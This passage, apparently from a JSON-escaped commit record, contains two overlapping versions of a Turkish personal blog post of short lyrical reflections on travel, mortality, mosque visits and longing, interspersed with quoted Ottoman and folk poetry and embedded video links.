kimsenin\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::nQh3bOwTnMg[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nEn \u00e7ok yolculuklar d\u00fc\u015f\u00fcnd\u00fcr\u00fcr insana, akl\u0131na gelmeyenler yakalar karanl\u0131\u011f\u0131n ve \u0131ss\u0131zl\u0131\u011f\u0131n ortas\u0131nda.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDilimde dua: \n\"Hata etmekten koru, us\u00fbls\u00fcz vusulden sana s\u0131\u011f\u0131nd\u0131k. 
Cahile yol g\u00f6ster.\" \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYazmal\u0131 m\u0131y\u0131m s\u00e2hiden? Sanki yazamad\u0131klar\u0131m\u0131 da g\u00f6nl\u00fcmden okursun. Oku ki kalks\u0131n sanc\u0131s\u0131 \u00fczerimden.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nUtana s\u0131k\u0131la, incitmekten korkarak...\n\nvideo::245933662[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n-_K\u0131r\u0131yorlar kalbini, yoruyorlar g\u00f6nl\u00fcn\u00fc nas\u0131l \u015fifa buluyorsun?_ +\n-Bir emanet gibi saklad\u0131\u011f\u0131m c\u00fcmlelerini okuyup okuyup deva buluyorum.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::QKnuIhKRWu0[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"Y\u00fcz \u00e7evirmem olsa d\u00fcnya bir yana ben bir yana_ +\n_\u015eem\u2019ine perv\u00e2neyim perv\u00e2 ne l\u00e2z\u0131md\u0131r bana_ +\n_Anlas\u0131n b\u00eeg\u00e2ne bilsin \u00e2\u015fin\u00e2 sevdim seni\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nMadem and\u0131k, bug\u00fcn de K\u00e2ni s\u00f6ylesin: \n\n_\"M\u00e2hum seni ben pen\u00e7e-i h\u00fbr\u015f\u00eede degi\u015fmem_ +\n_Ol s\u00eene-i s\u00e2f\u00ee dem-i isp\u00eede degi\u015fmem\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nHadsizli\u011fin zirvesinde yan\u0131mda utanc\u0131m... Bir y\u0131l evvelin sesidir yank\u0131lanan ve \u00e7irkindir, bilirim. G\u00fczel k\u0131lan yeg\u00e2ne \u015feydir i\u015fitecek olan kulaklar. \n\n\"_Sevgili Dost,_ +\n_Schumann: \"\u00e7alarken, seni kimin dinledi\u011fini umursama\" diyor. Bense umursuyorum, kimin dinledi\u011fini.\"_ +\n\nhttps:\/\/vimeo.com\/246656385\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDar\u0131lma, i\u015fte b\u00f6yle... 
+\n_\"Durup dinlenmeden akarsa p\u0131nar,_ +\n_Her y\u0131l k\u0131\u015ftan sonra gelirse bahar,_ +\n_Bal\u0131klar\u0131n suyu sevdi\u011fi kadar,_ +\n_Ben de seni seviyorum, dar\u0131lma.\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f","old_contents":"= K\u0131sa K\u0131sa (2)\n:hp-tags:\n\nBir s\u00fcredir haftada bir yapt\u0131\u011f\u0131m yolculuklarda fark\u0131na vard\u0131m ki her yolculuk bana \u00f6l\u00fcm\u00fc ciddi anlamda hat\u0131rlat\u0131yor. G\u00fcnl\u00fck ya\u015fant\u0131da mezarl\u0131k duvarlar\u0131n\u0131n arkas\u0131na silkeledi\u011fim(iz) bu ger\u00e7e\u011fi hat\u0131rlamama vesile oluyor yolculuklar. Her yolculuk bunu az veya \u00e7ok bir \u015fekilde y\u00e2d\u0131ma d\u00fc\u015f\u00fcr\u00fcyormu\u015f asl\u0131nda yeni farkettim. Neden sorusu bu sezi\u015fin pe\u015fine tak\u0131ld\u0131 hemencecik. \u0130lk akl\u0131ma gelen cevap \u015fu oldu: \"\u00d6l\u00fcm de bir yolculuktur neticede. Bu k\u0131sa yolculuklar o b\u00fcy\u00fck yolculu\u011fun bir musaggaras\u0131d\u0131r.\" Bir de \u015f\u00f6yle tartt\u0131m kendimi: \"Yoksa geri d\u00f6nememek korkusu mu bu ya\u015fad\u0131\u011f\u0131n?\", \"\u00d6l\u00fcm\u00fc de geri d\u00f6n\u00fc\u015f\u00fc olmayan bir gidi\u015f olarak g\u00f6r\u00fcyorsun da D\u00fcnya'ya d\u00fc\u015fk\u00fcnl\u00fc\u011f\u00fcn m\u00fc akl\u0131na getiriyor onu?\" Terazinin iki kefesine iki d\u00fc\u015f\u00fcnceyi de b\u0131rakt\u0131m, tahterevallide oynayan \u00e7ocuklar gibi hangileri a\u015fa\u011f\u0131da hangileri yukar\u0131da g\u00f6remedim.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBu yolculuklar\u0131n bitiminde kendimi bir arkada\u015f\u0131n kuca\u011f\u0131na b\u0131rak\u0131verdim. Birka\u00e7 ayd\u0131r uzak kald\u0131\u011f\u0131m, avlusunda kedilerin ko\u015fturmacas\u0131na dald\u0131\u011f\u0131m \u00dcsk\u00fcdar Mihrimah Sultan Cami\u00ee'nden ba\u015fka bir yer de\u011fildi. Her seferinde uzaktan g\u00fcl-endam\u0131n\u0131 seyredip biraz \u00f6zlem biraz sevin\u00e7le yol al\u0131yorum ona do\u011fru. Gece en siyah \u00e7ar\u015faf\u0131 \u00f6rterken g\u00f6ky\u00fcz\u00fcne avlusuna ayak bas\u0131yorum, Valide Sultan Cami\u00ee ile s\u00f6yle\u015fmeye ba\u015fl\u0131yor iki dost. B\u00f6lm\u00fcyorum onlar\u0131, dinliyorum bir yandan \u015fad\u0131rvandan akan sular\u0131n sesi. G\u00fcne\u015f utanga\u00e7l\u0131\u011f\u0131n\u0131 k\u0131z\u0131ll\u0131klar\u0131n ard\u0131nda b\u0131rakarak g\u00f6steriyor kendini. Bir ba\u015fka dostu g\u00f6r\u00fcyorum, uzak kalman\u0131n \u0131rak edemedi\u011fi bir dostu. Sonra diyorum: \"Dostu g\u00f6rmek, bayramd\u0131r.\"\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYolculuk, okul, i\u015f derken bir yo\u011funluk kapl\u0131yor d\u00f6rt yan\u0131m\u0131. Yapaca\u011f\u0131m i\u015flerin, g\u00f6revlerin vs. zihnimi me\u015fgul etmesi san\u0131r\u0131m daha yorucu oluyor. 
Bu yo\u011funluk i\u00e7erisinde bir yaz\u0131y\u0131 okumak i\u00e7in zaman kollamaya \u00e7al\u0131\u015f\u0131yordum, bir t\u00fcrl\u00fc nasip olmuyordu. Okudu\u011fum zaman normalde alamayaca\u011f\u0131m bir keyfi ald\u0131m. San\u0131r\u0131m okumak i\u00e7in g\u00f6sterdi\u011fim i\u015ftiyak kitapla\/yaz\u0131yla aramda bir ba\u011f olu\u015fmas\u0131na vesile oluyor. Ayn\u0131 durum ruhen, zihnen yo\u011fun oldu\u011fum veya kendimi yaln\u0131z hissetti\u011fim -y\u0131llard\u0131r tek ya\u015famama ra\u011fmen yaln\u0131z hissetti\u011fim zamanlar, kalabal\u0131klar i\u00e7indeki yaln\u0131zl\u0131\u011f\u0131mdan az- anlarda yine ortaya \u00e7\u0131k\u0131yor. Roman\u0131n bir kahraman\u0131 omzuma dokunuyor, bir di\u011feri elini uzat\u0131yor, \u00f6b\u00fcr\u00fc g\u00fcl\u00fcms\u00fcyor. Buna en iyi \u00f6rnek _Nisan'\u0131n 2 G\u00fcn\u00fc_, basit ve yal\u0131n bir anlat\u0131m\u0131 olsa da i\u00e7inde yer buldu\u011fum bir romand\u0131. Birka\u00e7 y\u0131l \u00f6nce okul k\u00fct\u00fcphanesinde denk gelip \u00f6d\u00fcn\u00e7 alm\u0131\u015ft\u0131m. Bir k\u0131\u015f g\u00fcn\u00fc s\u0131rt\u0131m\u0131 pete\u011fe dayay\u0131p okudu\u011fumu hat\u0131rl\u0131yorum. Petek siperin bir cephesi olmu\u015ftu, ayaklar\u0131m\u0131n siperin di\u011fer cephesine de\u011fdi\u011fini hissediyordum. Kabzas\u0131 ayaklar\u0131m\u0131n ucunda bir t\u00fcfek omzuma yaslanm\u0131\u015ft\u0131.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u0130yi insan tan\u0131yorum, ke\u015fke daha \u00f6nce tan\u0131sayd\u0131m diyorum. Ve ke\u015fkeye \u00f6yle bir duygu ve vurgu y\u00fckl\u00fcyorum ki takat getiremiyor, eziliyor. Bir mahr\u00fb -g\u00fczel tavr\u0131 ay gibi parl\u0131yor- bed\u00e2yi-\u00e2\u015fin\u00e2 (bed\u00e2yi-\u015finas) nas\u0131l olunur \u00f6\u011fretiyor. Ben ne kadar \u00f6\u011frenebilirim bilmiyorum. Bir daha *ke\u015fke*... \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nCevdet Pa\u015fa'n\u0131n eli omzuma dokundu.\n\n_Nas\u0131l \u00e7\u0131ld\u0131rmad\u0131m hayretdeyim h\u00e2l\u00e2 sevincimden_ +\n_Lis\u00e2n\u0131ndan seni sevdim s\u00f6z\u00fcn g\u00fb\u015f itdi\u011fim demler_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nG\u00f6kte ay, parl\u0131yor; ay\u0131n on d\u00f6rd\u00fcd\u00fcr. 
\n\n_Sana vard\u0131r y\u00fcre\u011fimde s\u00f6zlerim_\n\nvideo::So6VlDiHukI[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDede Efendi ne dersin b\u00f6yle?\n\nvideo::vvFUnXpoUSE[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"Anlat\u0131yorum, hi\u00e7 konu\u015fmadan,_ +\n_Bu\u011fday\u0131n i\u00e7ini d\u00f6kmesi gibi...\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBir dua, Kays'\u0131n dilinden g\u00f6nl\u00fcme d\u00fc\u015fer: +\n_\"Gittik\u00e7e h\u00fcsn\u00fcn eyle ziy\u00e2de nig\u00e2r\u0131m\u0131n_ +\n_Geldik\u00e7e derdine beter et m\u00fcptel\u00e2 beni\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n-_Neden kendi c\u00fcmlelerinle konu\u015fmazs\u0131n?_ +\n-Bu h\u00e2l, akl\u0131m\u0131 setr ederken ben nas\u0131l konu\u015fay\u0131m? +\n-_Peki niye kendine s\u00f6zc\u00fcler bulursun, onlar\u0131n diliyle s\u00f6ylersin?_ +\n-Dilim kendi g\u00f6nl\u00fcmden konu\u015fsa bu ate\u015f ya\u015f yaprak m\u0131 b\u0131rak\u0131r? +\n-_Peki niye susmazs\u0131n?_ +\n-\u0130\u00e7im ile durmadan s\u00f6yle\u015firken nas\u0131l susay\u0131m? +\n-_Haberdar oldu\u011funa delilin var m\u0131d\u0131r?_ +\n-Bir ay, ayd\u0131nl\u0131\u011f\u0131n\u0131n d\u00fc\u015ft\u00fc\u011f\u00fc g\u00f6n\u00fclden big\u00e2ne midir? +\n-_Ne vakte kadar inilersin?_ +\n-Vaktin varl\u0131\u011f\u0131ndan s\u0131yr\u0131lmadan tamam olunur mu? +\n-_Neyi beklersin?_ +\n-Pervane, \u015fem tutu\u015fmadan ne yaps\u0131n? Bekledi\u011fim \u015feminden bir \u0131\u015f\u0131kt\u0131r.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::asqjpUOo3YE[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nUyutmayan sebep, sen ne g\u00fczelsin! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYa Karacao\u011flan halim ortadad\u0131r, h\u00e2l\u00e2 uyand\u0131rmaz m\u0131? 
+\n_\"Perv\u00e2ne \u015fem\u2019ini uyand\u0131ramaz_ +\n_Ba\u015fta sevd\u00e2 kalpte n\u00e2r olmay\u0131nca\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00dcmit ve sab\u0131r, iki karde\u015f. Birbirlerine ne g\u00fczel sar\u0131l\u0131yor \u015fimdi. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00d6yle sermestim ki ne i\u015f ne yolculuk ne okul ne de s\u0131navdan bir yorgunluk hissediyorum. Nas\u0131l sermest olmayay\u0131m ki muhatap alm\u0131\u015fken bu bendeyi? \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00dcfleyiverdi y\u00e2reme \u015fifa deyu ol mehlik\u00e2 +\nAmma c\u00fb\u015fa getirdi i\u00e7re ate\u015fi bilmedi\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nAcemice, belki hadsizce. Dilime dolanmadan kelimeler s\u00f6ylemek kolay de\u011fil. +\nG\u00fcn do\u011fmas\u0131n pencereme ne olur, gecemi ayd\u0131nlatan ay yeter. +\n_Bir nefeslik lafz\u0131mda zikrime c\u00e2nan d\u00fc\u015fer_\n\nvideo::244526490[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nPervaneyi bir vesvese tutmu\u015f, ka\u00e7 gecedir uyumaz beni de uyutmaz. \"S\u00f6ylediklerimle \u015femi \u00fczer miyim?\", diye kara kara d\u00fc\u015f\u00fcn\u00fcr. \"Acaba \u015fem pervanenin varl\u0131\u011f\u0131ndan ho\u015fnut mudur?\" Teselli verdim, ikna etmeye kalk\u0131\u015ft\u0131m. K\u00e2r etmedi. Ne diyeyim, nas\u0131l edeyim? +\n*Pervane kendi acizli\u011fine hatalar\u0131na bak\u0131p vesveseye d\u00fc\u015ferdi. \u015eem \u00fcz\u00fclmesin; pervane tevekk\u00fcl ipine sar\u0131ld\u0131, \u00f6ylece uyudu.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nPervanenin benden ba\u015fka s\u0131rda\u015f\u0131 yok, kime anlats\u0131n halini? Kime d\u00f6ks\u00fcn i\u00e7ini? Ak\u0131tacak g\u00f6z\u00fcnden ya\u015flar\u0131 ama onlar\u0131n s\u0131rr\u0131n\u0131 if\u015fa edece\u011finden \u00e7ekinir. 
G\u00f6zya\u015flar\u0131n\u0131 da i\u00e7inde saklar.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eem'i \u00fczerlermi\u015f, yorgun b\u0131rak\u0131rlarm\u0131\u015f galiba. Be vefas\u0131z Pervane sen de durmaz kendi derdinden s\u00f6ylersin! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eeyh Galib'in duas\u0131na \"Amin!\" deriz. \n\n_\"Y\u00e2resi muht\u00e2c-\u0131 k\u00e2f\u00fbr olmas\u0131n bir kimsenin_ +\n_S\u00eeneden mehp\u00e2resi d\u00fbr olmas\u0131n bir kimsenin\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::nQh3bOwTnMg[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nEn \u00e7ok yolculuklar d\u00fc\u015f\u00fcnd\u00fcr\u00fcr insana, akl\u0131na gelmeyenler yakalar karanl\u0131\u011f\u0131n ve \u0131ss\u0131zl\u0131\u011f\u0131n ortas\u0131nda.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDilimde dua: \n\"Hata etmekten koru, us\u00fbls\u00fcz vusulden sana s\u0131\u011f\u0131nd\u0131k. Cahile yol g\u00f6ster.\" \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYazmal\u0131 m\u0131y\u0131m s\u00e2hiden? Sanki yazamad\u0131klar\u0131m\u0131 da g\u00f6nl\u00fcmden okursun. 
Oku ki kalks\u0131n sanc\u0131s\u0131 \u00fczerimden.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nUtana s\u0131k\u0131la, incitmekten korkarak...\n\nvideo::245933662[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n-_K\u0131r\u0131yorlar kalbini, yoruyorlar g\u00f6nl\u00fcn\u00fc nas\u0131l \u015fifa buluyorsun?_ +\n-Bir emanet gibi saklad\u0131\u011f\u0131m c\u00fcmlelerini okuyup okuyup deva buluyorum.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::QKnuIhKRWu0[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"Y\u00fcz \u00e7evirmem olsa d\u00fcnya bir yana ben bir yana_ +\n_\u015eem\u2019ine perv\u00e2neyim perv\u00e2 ne l\u00e2z\u0131md\u0131r bana_ +\n_Anlas\u0131n b\u00eeg\u00e2ne bilsin \u00e2\u015fin\u00e2 sevdim seni\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nMadem and\u0131k, bug\u00fcn de K\u00e2ni s\u00f6ylesin: \n\n_\"M\u00e2hum seni ben pen\u00e7e-i h\u00fbr\u015f\u00eede degi\u015fmem_ +\n_Ol s\u00eene-i s\u00e2f\u00ee dem-i isp\u00eede degi\u015fmem\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nHadsizli\u011fin zirvesinde yan\u0131mda utanc\u0131m... Bir y\u0131l evvelin sesidir yank\u0131lanan ve \u00e7irkindir, bilirim. G\u00fczel k\u0131lan yeg\u00e2ne \u015feydir i\u015fitecek olan kulaklar. \n\n\"_Sevgili Dost,_ +\n_Schumann: \"\u00e7alarken, seni kimin dinledi\u011fini umursama\" diyor. 
